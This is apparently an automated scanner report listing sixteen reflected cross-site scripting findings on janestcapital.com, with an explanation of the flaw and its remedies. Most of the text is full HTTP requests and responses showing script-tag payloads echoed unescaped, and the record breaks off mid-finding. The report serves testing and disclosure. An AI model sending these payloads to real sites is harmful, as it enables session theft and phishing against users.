janestcapital.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.janestcapital.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934b0"><script>alert(1)</script>134eb9d520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?934b0"><script>alert(1)</script>134eb9d520=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
X-Purpose: prefetch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tclrn7lmmp8rpatfidks0hj3u3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6685
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/?934b0"><script>alert(1)</script>134eb9d520=1">
...[SNIP]...

1.2. http://www.janestcapital.com/apply [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2717"><script>alert(1)</script>c947fa3d626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /apply?e2717"><script>alert(1)</script>c947fa3d626=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/?e2717"><script>alert(1)</script>c947fa3d626=1">
...[SNIP]...

1.3. http://www.janestcapital.com/apply/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16fd0"><script>alert(1)</script>16d94586572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/?16fd0"><script>alert(1)</script>16d94586572=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.1.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/?16fd0"><script>alert(1)</script>16d94586572=1">
...[SNIP]...

1.4. http://www.janestcapital.com/apply/calendar.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/calendar.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1476"><script>alert(1)</script>5cef7cf715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/calendar.php?a1476"><script>alert(1)</script>5cef7cf715=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/apply/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.4.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/calendar.php?a1476"><script>alert(1)</script>5cef7cf715=1">
...[SNIP]...

1.5. http://www.janestcapital.com/apply/calendar.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/calendar.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87907"><script>alert(1)</script>b423ed4522e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/calendar.php/x2287907"><script>alert(1)</script>b423ed4522e HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11090

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/calendar.php/x2287907"><script>alert(1)</script>b423ed4522e">
...[SNIP]...

1.6. http://www.janestcapital.com/apply/calendar.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/calendar.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 964d4"><script>alert(1)</script>66a64a5a672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/calendar.php/x22?964d4"><script>alert(1)</script>66a64a5a672=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11093

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/calendar.php/x22?964d4"><script>alert(1)</script>66a64a5a672=1">
...[SNIP]...

1.7. http://www.janestcapital.com/apply/interview.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/interview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a47d"><script>alert(1)</script>bc3cc5f82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/interview.php?6a47d"><script>alert(1)</script>bc3cc5f82a8=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6287
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/interview.php?6a47d"><script>alert(1)</script>bc3cc5f82a8=1">
...[SNIP]...

1.8. http://www.janestcapital.com/apply/interview.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/interview.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdda5"><script>alert(1)</script>128e90774cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/interview.php/x22fdda5"><script>alert(1)</script>128e90774cc HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/interview.php/x22fdda5"><script>alert(1)</script>128e90774cc">
...[SNIP]...

1.9. http://www.janestcapital.com/apply/interview.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/interview.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebc4"><script>alert(1)</script>5e3450afe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/interview.php/x22?cebc4"><script>alert(1)</script>5e3450afe67=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6291
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/interview.php/x22?cebc4"><script>alert(1)</script>5e3450afe67=1">
...[SNIP]...

1.10. http://www.janestcapital.com/apply/oap.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/oap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed121"><script>alert(1)</script>266b01b51d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/oap.php?ed121"><script>alert(1)</script>266b01b51d0=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6829
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/oap.php?ed121"><script>alert(1)</script>266b01b51d0=1">
...[SNIP]...

1.11. http://www.janestcapital.com/apply/research.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/research.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8b3"><script>alert(1)</script>99d9f0023d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/research.php?4b8b3"><script>alert(1)</script>99d9f0023d7=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6931
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/research.php?4b8b3"><script>alert(1)</script>99d9f0023d7=1">
...[SNIP]...

1.12. http://www.janestcapital.com/apply/send_application.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/send_application.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbcd"><script>alert(1)</script>9a40e5cab8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/send_application.php?9dbcd"><script>alert(1)</script>9a40e5cab8a=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5859
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/apply/send_application.php?9dbcd"><script>alert(1)</script>9a40e5cab8a=1">
...[SNIP]...

1.13. http://www.janestcapital.com/apply/skills.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/skills.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837e9"><script>alert(1)</script>fd1370d0c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/skills.php?837e9"><script>alert(1)</script>fd1370d0c28=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6116
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/skills.php?837e9"><script>alert(1)</script>fd1370d0c28=1">
...[SNIP]...

1.14. http://www.janestcapital.com/apply/skills.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/skills.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad21"><script>alert(1)</script>aad006e499 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/skills.php/x22fad21"><script>alert(1)</script>aad006e499 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6116
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/skills.php/x22fad21"><script>alert(1)</script>aad006e499">
...[SNIP]...

1.15. http://www.janestcapital.com/apply/skills.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/skills.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20cfe"><script>alert(1)</script>f7a29e1998e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/skills.php/x22?20cfe"><script>alert(1)</script>f7a29e1998e=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6120
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/skills.php/x22?20cfe"><script>alert(1)</script>f7a29e1998e=1">
...[SNIP]...

1.16. http://www.janestcapital.com/apply/software.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/software.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d36"><script>alert(1)</script>e633747ac48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/software.php?93d36"><script>alert(1)</script>e633747ac48=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
